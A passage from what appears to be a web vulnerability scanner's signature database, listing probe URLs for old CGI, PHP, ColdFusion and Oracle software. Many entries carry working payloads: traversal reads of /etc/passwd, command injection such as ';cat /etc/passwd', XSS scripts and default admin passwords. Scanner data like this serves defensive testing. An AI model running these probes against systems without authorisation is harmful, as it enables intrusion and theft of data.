interesting..." c,generic,/,search.vts,200,GET,"This might be interesting..." c,generic,/,search/,"Sample Search Interface",GET,"Default iPlanet search is enabled." c,generic,/,search97.vts,200,GET,"This might be interesting..." c,generic,/,secret/,200,GET,"This might be interesting..." c,generic,/,secure/,"Index of ",GET,"This might be interesting..." c,generic,/,securecontrolpanel/,200,GET,"Web Server Control Panel" c,generic,/,secured/,"Index of ",GET,"This might be interesting..." c,generic,/,sell/,200,GET,"This might be interesting..." c,generic,/,server_stats/,"Index of ",GET,"This might be interesting..." c,generic,/,SetSecurity.shm,200,GET,"Cisco System's My Access for Wireless... This resource should be password protected." c,generic,/,setup.exe?&page=list_users&user=P,"",GET,"CiscoSecure ACS v3.0(1) Build 40 allows Cross Site Scripting (XSS). CA-2000-02." c,generic,/,setup/,200,GET,"This might be interesting..." c,generic,/,sgdynamo.exe?HTNAME=,"",GET,"Ecometry's SGDynamo is vulnerable to Cross Site Scripting (XSS). CAN-2002-0375. CA-2000-02." c,generic,/,shop/,200,GET,"This might be interesting..." c,generic,/,shopadmin.asp,200,GET,"VP-ASP shopping cart admin mayy be available via the web. Default ID/PW are vpasp/vpasp and admin/admin." c,generic,/,shopa_sessionlist.asp,200,GET,"VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available." c,generic,/,shopdbtest.asp,"xDatabase",GET,"VP-ASP shopping cart test application is available from the web. This page gives the location of .mdb files which may also be available (xDatabase)." c,generic,/,shopper/,200,GET,"This might be interesting..." c,generic,/,shopping300.mdb,200,GET,"VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available." c,generic,/,shopping400.mdb,200,GET,"VP-ASP shopping cart application allows .mdb files (which may include customer data) to be downloaded via the web. These should not be available." c,generic,/,SilverStream,"/Pages",GET,"SilverStream allows directory listing" c,generic,/,site/iissamples/,200,GET,"This might be interesting..." c,generic,/,siteminder,200,GET,"This may be an indication that the server is running Siteminder for SSO" c,generic,/,SiteScope/cgi/go.exe/SiteScope?page=eventLog&machine=&logName=System&account=administrator,"Event Log",GET,"SiteScope service has no password set. Restrict by IP and set a password." c,generic,/,smssend.php,200,GET,"PhpSmssend may allow system calls if a ' is passed to it. http://zekiller.skytech.org/smssend.php" c,generic,/,software/,"Index of ",GET,"This might be interesting..." c,generic,/,source/,"Index of ",GET,"This might be interesting..." c,generic,/,splashAdmin.php,200,GET,"Cobalt Qube 3 admin is running. This may have multiple security problems as described by www.scan-associates.net. These could not be tested remotely." c,generic,/,sql/,"Index of ",GET,"This might be interesting..." c,generic,/,src/,"Index of ",GET,"This might be interesting..." c,generic,/,srchadm,200,GET,"This might be interesting..." c,generic,/,ss.cfg,200,GET,"This might be interesting..." c,generic,/,ssi/,"Index of ",GET,"This might be interesting..." c,generic,/,staff/,200,GET,"This might be interesting..." c,generic,/,stat.htm,200,GET,"Just found this log file..." c,generic,/,stat/,200,GET,"This might be interesting..." c,generic,/,statistic/,200,GET,"This might be interesting..." c,generic,/,statistics/,200,GET,"This might be interesting..." c,generic,/,stats.htm,200,GET,"Just found this log file..." c,generic,/,stats.html,200,GET,"Just found this log file..." c,generic,/,stats.txt,200,GET,"Just found this log file..." c,generic,/,Stats/,200,GET,"This might be interesting..." c,generic,/,stats/,200,GET,"This might be interesting..." c,generic,/,status/,200,GET,"This might be interesting..." c,generic,/,store/,200,GET,"This might be interesting..." c,generic,/,StoreDB/,200,GET,"This might be interesting..." c,generic,/,style/,"Index of ",GET,"May be able to view web styles directory." c,generic,/,styles/,"Index of ",GET,"May be able to view web styles directory." c,generic,/,submit.php?subject=&story=&storyext=&op=Preview","",GET,"This install of PHPNuke is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,super_stats/access_logs,200,GET,"This might be interesting..." c,generic,/,support/,200,GET,"This might be interesting..." c,generic,/,sys/,200,GET,"This might be interesting..." c,generic,/,system/,200,GET,"This might be interesting..." c,generic,/,temp/,200,GET,"This might be interesting..." c,generic,/,template/,200,GET,"This may be interesting as the directory may hold sensitive files or reveal system information." c,generic,/,test/,200,GET,"This might be interesting..." c,generic,/,testing/,200,GET,"This might be interesting..." c,generic,/,ticket.php?id=99999,"expects first argument",GET,"ZenTrack from http://zentrack.phpzen.net/ versions v2.0.3, v2.0.2beta and older reveal the web root with certain errors." c,generic,/,tmp/,200,GET,"This might be interesting..." c,generic,/,tools/,200,GET,"This might be interesting..." c,generic,/,trafficlog/,200,GET,"This might be interesting..." c,generic,/,tree/,200,GET,"This might be interesting..." c,generic,/,updates/,200,GET,"This might be interesting..." c,generic,/,usage/,"Generated by The Webalizer",GET,"Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,user.php?op=userinfo&uname=,"",GET,"The PhpNuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. CA-2000-02." c,generic,/,user/,200,GET,"This might be interesting..." c,generic,/,usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27),GET,"",GET,"IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,userinfo.php?uid=1;,"Query",GET,"Xoops portal gives detailed error messages including SQL syntax and may allow an exploit." c,generic,/,userlog.php,200,GET,"Teekai's Tracking Online 1.0 log can be retrieved remotely." c,generic,/,users/,200,GET,"This might be interesting..." c,generic,/,ustats/,200,GET,"This might be interesting..." c,generic,/,vfs/,200,GET,"This might be interesting..." c,generic,/,viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1,"root:",GET,"KorWebLog from http://weblog.kldp.org/ allows any file to be read on the system." c,generic,/,view_source.jsp,200,GET,"Resin 2.1.2 view_source.jsp allows any file on the system to be viewed by using \..\ directory traversal. This script may be vulnerable." c,generic,/,w3perl/admin,200,GET,"This might be interesting..." c,generic,/,warez/,200,GET,"Uh oh..." c,generic,/,web/,"Generated by The Webalizer",GET,"Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,web/,200,GET,"This might be interesting..." c,generic,/,web800fo/,200,GET,"This might be interesting..." c,generic,/,webaccess.htm,200,GET,"Just found this log file..." c,generic,/,webaccess/access-options.txt,200,GET,"Just found this file..." c,generic,/,webadmin/,200,GET,"This might be interesting...may be HostingController, www.hostingcontroller.com" c,generic,/,webalizer/,"Generated by The Webalizer",GET,"Webalizer may be installed. Versions lower than 2.10-09 vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/,webboard/,200,GET,"This might be interesting..." c,generic,/,webcart-lite/,200,GET,"This might be interesting..." c,generic,/,webcart/,200,GET,"This might be interesting..." c,generic,/,webdata/,200,GET,"This might be interesting..." c,generic,/,weblog/,200,GET,"This might be interesting..." c,generic,/,weblogic,"index of",GET,"Weblogic directory is available with indexing." c,generic,/,weblogs/,200,GET,"This might be interesting..." c,generic,/,webmail/,200,GET,"Web based mail package installed." c,generic,/,WebShop/,200,GET,"This might be interesting..." c,generic,/,website/,200,GET,"This might be interesting..." c,generic,/,webstats/,200,GET,"This might be interesting..." c,generic,/,WebTrend/,200,GET,"This might be interesting..." c,generic,/,Web_store/,200,GET,"This might be interesting..." c,generic,/,wstats/,200,GET,"This might be interesting..." c,generic,/,WS_FTP.ini,200,GET,"Can contain saved passwords for ftp sites" c,generic,/,ws_ftp.ini,200,GET,"Can contain saved passwords for ftp sites" c,generic,/,wusage/,200,GET,"This might be interesting..." c,generic,/,www-sql/,200,GET,"This might be interesting..." c,generic,/,www/,200,GET,"This might be interesting..." c,generic,/,wwwjoin/,200,GET,"This might be interesting..." c,generic,/,wwwlog/,200,GET,"This might be interesting..." c,generic,/,wwwstats.html,200,GET,"Just found this log file..." c,generic,/,wwwstats/,200,GET,"This might be interesting..." c,generic,/,zipfiles/,200,GET,"This might be interesting..." c,generic,/,_private/,200,GET,"This might be interesting..." c,generic,/,~root/,200,GET,"Allowed to browse root's home directory" c,generic,////./../.../,boot.ini,"boot loader",GET,"Server is vulnerable to directory traversal, this may be Lidik Webserver 0.7b from lysias.de. See http://www.it-checkpoint.net/advisory/14.html for details." c,generic,/a.jsp/,,"",GET,"JServ is vulnerable to Cross Site Scripting (XSS) when a non-existent JSP file is requested. Upgrade to the latest version of JServ. CA-2000-02." c,generic,/accounts/,getuserdesc.asp,200,GET,"Hosting Controller 2002 administration page is available. This should be protected." c,generic,/Admin,/,"CobaltServer",GET,"The web server is the CobaltRaq administrator. If password protection is broken, attackers wil have access to admin your server. Use tcpwrappers or shut this down for safety." c,generic,/admin/,"login.php?path=\">
    <script>alert('Vulnerable')","",GET,"mcNews 1.1a from phpforums.net is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/admin/,admin_phpinfo.php4,200,GET,"Mon Album from http://www.3dsrc.com version 0.6.2d allows remote admin access. This should be protected." c,generic,/admin/,browse.asp?FilePath=c:\&Opt=2&level=0,"winnt",GET,"Hosting Controller from hostingcontroller.com allows any file on the system to be read remotely." c,generic,/admin/,cplogfile.log,200,GET,"DevBB 1.0 final (http://www.mybboard.com) log file is readable remotely. Upgrade to the latest version." c,generic,/admin/,login.php?action=insert&username=test&password=test,200,GET,"phpAuction may allow user admin accounts to be inserted without proper authentication. Attempt to log in with user 'test' password 'test' to verify." c,generic,/Admin_files/,order.log,200,GET,"Selena Sol's WebStore 1.0 exposes order information, http://www.extropia.com/, http://www.mindsec.com/advisories/post2.txt." c,generic,/aktivate/cgi-bin/,"catgy.cgi?key=0&cartname=axa200135022551089&desc=","",GET,"Aktivate Shopping Cart 1.03 and lower are vulnerable to Cross Site Scripting (XSS). http://www.allen0keul.com/aktivate/ CAN-2001-1212, CA-2000-02." c,generic,/ans/,ans.pl?p=../../../../../usr/bin/id|&blah,"uid",GET,"Avenger's News System allows commands to be issued remotely." c,generic,/anthill/,login.php,200,GET,"Anthill bug tracking system may be installed. Versions lower than 0.1.6.1 allow XSS/HTML injection and may allow users to bypass login requirements. http://anthill.vmlinuz.ca/ and CA-2000-02" c,generic,/ASP/cart/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." c,generic,/b2-include/,b2edit.showposts.php,200,GET,"Some versions of B2 (cafelog.com) are vulnerable to remote inclusion by redefining $b2inc to a remote php file. Upgrade to a version higher than b2.06pre2. This vulnerability could not be confirmed." c,generic,/base/webmail/,readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1,"root:",GET,"Remote file retrieval." c,generic,/bb-dnbd/,faxsurvey,200,GET,"This may allow arbitrary command execution." c,generic,/cart,cart.cgi,200,GET,"If this is Dansie shopping cart 3.0.8 or earlier, it contains a backdoor to allow attackers to execute arbitrary commands." c,generic,/ccbill/secure/,ccbill.log,200,GET,"This might be interesting... CC Bill log file?" c,generic,/cfappman/,index.cfm,200,GET,"susceptible to ODBC/pipe-style exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm" c,generic,/cfdocs/,cfcache.map,"Mapping",GET,"May leak directy listing, may also leave server open to a DOS" c,generic,/cfdocs/,cfmlsyntaxcheck.cfm,200,GET,"can be used for a DoS on the server by requesting it check all .exe's" c,generic,/cfdocs/,exampleapp/docs/sourcewindow.cfm?Template=c:\boot.ini,"boot loader",GET,"Allows attacker to view arbitrary files" c,generic,/cfdocs/,exampleapp/email/application.cfm,200,GET,"This might be interesting..." c,generic,/cfdocs/,exampleapp/email/getfile.cfm?filename=c:\boot.ini,"boot loader",GET,"Allows attacker to view arbitrary files" c,generic,/cfdocs/,exampleapp/publish/admin/addcontent.cfm,200,GET,"This might be interesting..." c,generic,/cfdocs/,exampleapp/publish/admin/application.cfm,200,GET,"This might be interesting..." c,generic,/cfdocs/,examples/cvbeans/beaninfo.cfm,200,GET,"susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm" c,generic,/cfdocs/,examples/httpclient/mainframeset.cfm,200,GET,"This might be interesting" c,generic,/cfdocs/,examples/parks/detail.cfm,200,GET,"susceptible to our ODBC exploit; see RFP9901 http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm" c,generic,/cfdocs/,expeval/displayopenedfile.cfm,200,GET,"Unknown vul" c,generic,/cfdocs/,expeval/exprcalc.cfm?OpenFilePath=c:\boot.ini,"boot loader",GET,"Allows attacker to view arbitrary files." c,generic,/cfdocs/,expeval/openfile.cfm,200,GET,"Unknown vul" c,generic,/cfdocs/,expeval/sendmail.cfm,200,GET,"can be used to send email; go to the page and fill in the form" c,generic,/cfdocs/,snippets/evaluate.cfm,200,GET,"can enter CF code to be evaluated, or create denial of service see www.allaire.com/security/ technical papers and advisories for info" c,generic,/cfdocs/,snippets/fileexists.cfm,200,GET,"can be used to verify the existance of files (on the same drive info as the web tree/file)" c,generic,/cfdocs/,snippets/gettempdirectory.cfm,200,GET,"depending on install, creates files, gives you physical drive info, sometimes defaults to \winnt\ directory as temp directory" c,generic,/cfdocs/,snippets/viewexample.cfm,200,GET,"this can be used to view .cfm files, request viewexample.cfm?Tagname=..\..\..\file (.cfm is assumed)" c,generic,/CFIDE/administrator/,index.cfm,"PasswordProvided",GET,"Coldfusion 4.5.1 and earlier may have an overflow DoS by modifying the login page and submit 40k character passwords. This page should not be accessible to all users." c,generic,/cgi,/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\windows\win.ini,"[fonts]",GET,"The ColdFusion install allows attackers to read arbitrary files remotely" c,generic,/cgi,/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\win.ini,"[fonts]",GET,"The ColdFusion install allows attackers to read arbitrary files remotely" c,generic,/cgi-bin-sdb/,printenv,"/usr/bin/perl",GET,"SuSe is configured with a link from cgi-bin-sdb to cgi-bin. Change the accompanying 'Alias' to 'ScriptAlias' in httpd.conf" c,generic,/cgi-bin/,"handler/netsonar;cat /etc/passwd|?data=Dowload","root:",GET,"comes with IRIX 5.3 - 6.4; allows to run arbitrary commands" c,generic,/cgi-bin/,.cobalt/siteUserMod/siteUserMod.cgi,200,GET,"Older versions of this CGI allow any user to change the administrator password." c,generic,/cgi-bin/,bigconf.cgi,200,GET,"BigIP Configuration CGI" c,generic,/cgi-bin/,common/listrec.pl,200,GET,"This CGI allows attackers to execute commands on the host." c,generic,/cgi-bin/,dbmlparser.exe,200,GET,"This might be interesting..." c,generic,/cgi-bin/,handler,200,GET,"comes with IRIX 5.3 - 6.4; allows to run arbitrary commands" c,generic,/cgi-bin/,icat,200,GET,"This might be interesting..." c,generic,/cgi-bin/,MachineInfo,200,GET,"gives out information on the machine (IRIX), including hostname" c,generic,/cgi-bin/,pfdisplay.cgi,200,GET,"comes with IRIX 6.2-6.4; allows to run arbitrary commands" c,generic,/cgi-bin/,webdist.cgi,200,GET,"comes with IRIX 5.0 - 6.3; allows to run arbitrary commands" c,generic,/cgi-bin/,wrap,200,GET,"comes with IRIX 6.2; allows to view directories" c,generic,/cgi-bin/admin/,admin.cgi,200,GET,"May be ImageFolio Pro administration CGI. Default login is Admin/ImageFolio." c,generic,/cgi-bin/admin/,setup.cgi,200,GET,"May be ImageFolio Pro setup CGI. Default login is Admin/ImageFolio." c,generic,/cgi-local/cgiemail-1.4/,cgicso?query=,"",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/cgi-local/cgiemail-1.4/,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands." c,generic,/cgi-local/cgiemail-1.6/,cgicso?query=,"",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/cgi-local/cgiemail-1.6/,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands." c,generic,/cgi-shop/,view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00,"root:",GET,"This CGI allows reading of remote files. CAN-2001-1019." c,generic,/cgi-sys/,addalink.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,cgiecho,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,cgiemail,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,countedit,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,domainredirect.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,entropybanner.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,entropysearch.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,FormMail-clone.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,helpdesk.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,mchat.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,randhtml.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,realhelpdesk.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,realsignup.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,scgiwrap,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi-sys/,signup.cgi,200,GET,"Default CGI, often with a hosting manager of some sort. No known problems, but host managers allow sys admin via web" c,generic,/cgi/,cgiproc?,200,GET,"It may be possible to crash Nortel Contivity VxWorks by requesting '/cgi/cgiproc?$' (not attempted!). Upgrade to version 2.60 or later." c,generic,/cgis/wwwboard/,wwwboard.cgi,200,GET,"Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'." c,generic,/cgis/wwwboard/,wwwboard.pl,200,GET,"Versions 2.0 Alpha and below have multiple problems. See BID-649 and BID 1795. Default ID 'WebAdmin' with pass 'WebBoard'." c,generic,/chassis/config/,GeneralChassisConfig.html,"Chassis Configuration",GET,"The Cabletron switch may allow remote configuration, or data retrieval, through the web interface." c,generic,/comments/,browse.php?fid=2&tid=4&go=<script>alert('Vulnerable')</script>,"",GET,"php(Reactor) v1.2.7 and older are vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/config,/,200,GET,"Configuration information may be available remotely." c,generic,/config/,checks.txt,200,GET,"This might be interesting..." c,generic,/counter/,1/n/n/0/3/5/0/a/123.gif,200,GET,"The Roxen Counter may eat up excessive CPU time with image requests." c,generic,/data/,member_log.txt,200,GET,"Teekai's forum full 1.2 member's log can be retrieved remotely." c,generic,/data/userlog/,log.txt,200,GET,"Teekai's Tracking Online 1.0 log can be retrieved remotely." c,generic,/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." c,generic,/dc/auth_data/,auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,/dc/orders/,orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,/dcforum/,dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00,"root:",GET,"This install of DCForum allows attackers to read arbitrary files on the host." c,generic,/dcshop/auth_data/,auth_user_file.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,/dcshop/orders/,orders.txt,200,GET,"The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information." c,generic,/demo/ojspext/events/,globals.jsa,"event:application_OnStart",GET,"Oracle 9iAS allows .jsa files to be retrieved, which may contain sensitive information." c,generic,/demo/sql/,index.jsp,"JSP SQL Samples",GET,"This default may allow connectivity to the Oracle databases." c,generic,/doc,/,200,GET,"The /doc directory is browsable. This may be /usr/doc." c,generic,/doc/packages,/,"index of /doc",GET,"This directory may show attackers all the packages installed on the system." c,generic,/docs/,showtemp.cfm?TYPE=JPEG&FILE=c:\boot.ini,"boot loader",GET,"Gafware's CFXImage allows remote users to view any file on the system." c,generic,/error/,"500error.jsp?et=1;","",GET,"Macromedia Sitespring 1.2.0(277.1) on Windows 2000 is vulnerable to Cross Site Scripting (XSS) in the error pages. CA-2000-02." c,generic,/etc/,passwd,"root:",GET,"An '/etc/passwd' file is available through the web site. This may not be good at all." c,generic,/ews/ews/,architext_query.pl,200,GET,"Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands. BID-2665." c,generic,/examples/basic/servlet/,HelloServlet,"The source of this servlet is in",GET,"Caucho Resin from http://www.caucho.com/ reveals file system paths with a default servlet." c,generic,/exec/show/config/,cr,"ip address",GET,"The Cisco router's web install allows arbitrary commands to be executed remotely." c,generic,/fcgi-bin/,echo.exe?foo=,"",GET,"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/fcgi-bin/,echo2.exe?foo=,"",GET,"Fast-CGI has two default CGI programs (echo.exe/echo2.exe) vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/filemanager/,filemanager_forms.php,200,GET,"Some versions of PHProjekt allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/unixfocus/5PP0F1P6KS.html for more info" c,generic,/forum/,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320" c,generic,/fpdb/,shop.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." c,generic,/GW5/,GWWEB.EXE?HELP=bad-request,"Could not find file SYS",GET,"Groupwise allows system information and file retrieval by modifying arguments to the help system." c,generic,/html/cgi-bin/,cgicso?query=,"",GET,"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/html/cgi-bin/,cgicso?query=AAA,"400 Required field missing: fingerhost",GET,"This CGI allows attackers to execute remote commands." c,generic,/instantwebmail/,message.php,200,GET,"Instant Web Mail (http://understroem.kdc/instantwebmail/) is installed. Versions 0.59 and lower can allow remote users to embed POP3 commands in URLs contained in email." c,generic,/interscan/cgi-bin/,"FtpSave.dll?I'm%20Here","These settings have been saved",GET,"Multiple files in the Interscan management server allow attackers to change settins without auth. Upgrade to the latest version of the Interscan product." c,generic,/jsp/jspsamp/jspexamples/,viewsource.jsp?source=../../../../../../../../../../boot.ini,"boot loader",GET,"Default JRun CGI lets users read any system file." c,generic,/jsp/jspsamp/jspexamples/,viewsource.jsp?source=../../../../../../../../../../etc/passwd,"root:",GET,"Default JRun CGI lets users read any system file." c,generic,/jspdocs,/,"OracleJSP",GET,"Default Oracle JSP documentation." c,generic,/level/42/exec/,show%20conf,200,GET,"Retrieved Cisco configuration file." c,generic,/logs,/,200,GET,"Ahh...log information...fun!" c,generic,/logs/,access_log,200,GET,"Just found this log..." c,generic,/mail,/,200,GET,"This might be interesting..." c,generic,/mail/,addressaction.html?id=&newaddress=1&addressname=&addressemail=junk@example.com,"",GET,"IceWarp Webmail 3.3.3 is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/mailman/admin/,"ml-name?\">;","",GET,"Mailmain is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/mailman/listinfo/,","",GET,"Mailman is vulnerable to Cross Site Scripting (XSS). Upgrade to version 2.0.8 to fix. CA-2000-02." c,generic,/mall_log_files/,order.log,200,GET,"EZMall2000 exposes order information, http://www.ezmall2000.com/, see http://www.mindsec.com/advisories/post2.txt for details." c,generic,/manage/cgi/,cgiproc,200,GET,"This might be interesting..." c,generic,/manager,/,200,GET,"May be a web server or site manager." c,generic,/marketing,/,200,GET,"This might be interesting..." c,generic,/mcartfree/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." c,generic,/members,/,200,GET,"This might be interesting..." c,generic,/metacart/database/,metacart.mdb,200,GET,"MetaCart2 is an ASP shopping cart. The database of customers is available via the web." c,generic,/MIDICART/,midicart.mdb,200,GET,"MIDICART database is available for browsing. This should not be allowed via the web server." c,generic,/ministats/,admin.cgi,200,GET,"Just found this cgi..." c,generic,/misc,/,200,GET,"This might be interesting..." c,generic,/mkstats,/,200,GET,"This might be interesting..." c,generic,/msql,/,200,GET,"This might be interesting..." c,generic,/nav/,cList.php?root=",GET,"Pforum 1.14 is vulnerable to Cross Site Scripting (XSS). CA-2000-02" c,generic,/phorum/admin/,footer.php?GLOBALS[message]=,"",GET,"Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/phorum/admin/,header.php?GLOBALS[message]=,"",GET,"Phorum 3.3.2a and below from phorum.org is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/phorum/admin/,stats.php,"Phorum Stats",GET,"PHP based forum script Phorum allows a user to retrieve the top ten active users, including email addresses. Delete the script or pass protect it." c,generic,/php/,mlog.phtml,200,GET,"Remote file read vulnerability CVE-1999-0346" c,generic,/php/,mylog.phtml?screen=/etc/passwd,"root:",GET,"Remote file read vulnerability CVE-1999-0346" c,generic,/php/,php.exe?c:\winnt\boot.ini,"boot loader",GET,"Apache/PHP installations can be misconfiugred (according to documentation) to allow files to be retrieved remotely." c,generic,/phpBB/,bb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK,"root:",GET,"The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320" c,generic,/phpBB2/includes/,db.php,200,GET,"Some versions of db.php from phpBB2 allow remote file inclusions. Verify the current version is running. See http://www.securiteam.com/securitynews/5BP0F2A6KC.html for more info" c,generic,/phpclassifieds/,latestwap.php?url=,"",GET,"PHP Classifieds 6.05 from http://www.deltascripts.com/ is vulnerable toCross Site Scripting (XSS). CA-2000-02." c,generic,/phprocketaddin/,?page=../../../../../../../../../../boot.ini,"boot loader",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host." c,generic,/phprocketaddin/,?page=../../../../../../../../../../etc/passwd,"root:",GET,"The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host." c,generic,/pls/,sample/admin_/help/..%255cplsql.conf,"Directives added for mod-plsql",GET,"Oracle 9iAS allows mod_plsql to perform a directory traversal." c,generic,/pls/help/,,"",GET,"Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02." c,generic,/pls/portal30/,admin_/,"Gateway Configuration Menu",GET,"Default Oracle 9iAS allows unrestricted access to the mod_plsql DAD admin interface." c,generic,/pls/simpledad/admin_/,gateway.htm?schema=sample,"Gateway Configuration Menu",GET,"This default may allow limited administration of the Oracle server." c,generic,/project/,index.php?m=projects&user_cookie=1,200,GET,"dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL." c,generic,/pub/,english.cgi?op=rmail,200,GET,"BSCW self-registration may be enabled. This could allow untrusted users semi-trusted access to the software. 3.x version (and probably some 4.x) allow arbitrary commands to be executed remotely. See http://www.securitytracker.com/alerts/2002/Jan/1003092.html" c,generic,/pvote/,ch_info.php,200,GET,"PVote administration page is available. Versions 1.5b and lower do not require authentication to reset the administration password." c,generic,/pw/,storemgr.pw,200,GET,"Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information." c,generic,/ROADS/cgi-bin/,search.pl?form=../../../../../../../../../../etc/passwd%00,"root:",GET,"The ROADS search.pl allows attackers to retrieve system files." c,generic,/scripts/,wsisa.dll/WService=anything?WSMadmin",200,GET,"Allows Webspeed to remotely administered. Edit unbroker.properties and set AllowMsngrCmds to 0" c,generic,/search97cgi/,s97_cgi,200,GET,"SCO Unixware search script may be vulnerable to XSS and command injection, BID-1717, CVE-2000-1014" c,generic,/search97cgi/,s97_cgi?action=FilterSearch&filter=;,"",GET,"SCO Unixware search script is vulnerable to XSS and command injection, BID-1717, CVE-2000-1014" c,generic,/servlet/,"admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22adminRealm%22%2C+uri%3D%22%2Fservlet%2Fadmin%22&service=","server.javawebserver.serviceAdmin",GET,"The Sun JavaServer has the default admin/admin account enabled. Change the password or disable the server if it is not needed." c,generic,/servlet/,allaire.jrun.ssi.SSIFilter,200,GET,"Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","" c,generic,/servlet/,com.livesoftware.jrun.plugins.ssi.SSIFilter,200,GET,"Allaire Coldfusion allows jsp source viewed through a vulnerable SSI call.","" c,generic,/servlet/,com.unify.servletexec.UploadServlet,200,GET,"This servlet allows attackers to upload files to the server." c,generic,/servlet/,Counter,200,GET,"JRun default servlet found. All default code should be removed from servers." c,generic,/servlet/,DateServlet,200,GET,"JRun default servlet found. All default code should be removed from servers." c,generic,/servlet/,FingerServlet,200,GET,"JRun default servlet found. All default code should be removed from servers." c,generic,/servlet/,HelloWorldServlet,200,GET,"JRun default servlet found. All default code should be removed from servers." c,generic,/servlet/,IsItWorking,"Yes, It's working",GET,"Default 